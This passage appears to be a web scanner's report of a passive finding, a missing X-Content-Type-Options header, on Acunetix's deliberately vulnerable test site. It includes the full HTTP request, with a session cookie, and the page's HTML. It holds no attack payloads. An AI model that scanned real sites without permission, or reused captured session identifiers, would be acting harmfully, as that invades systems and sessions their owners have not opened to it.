mVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3V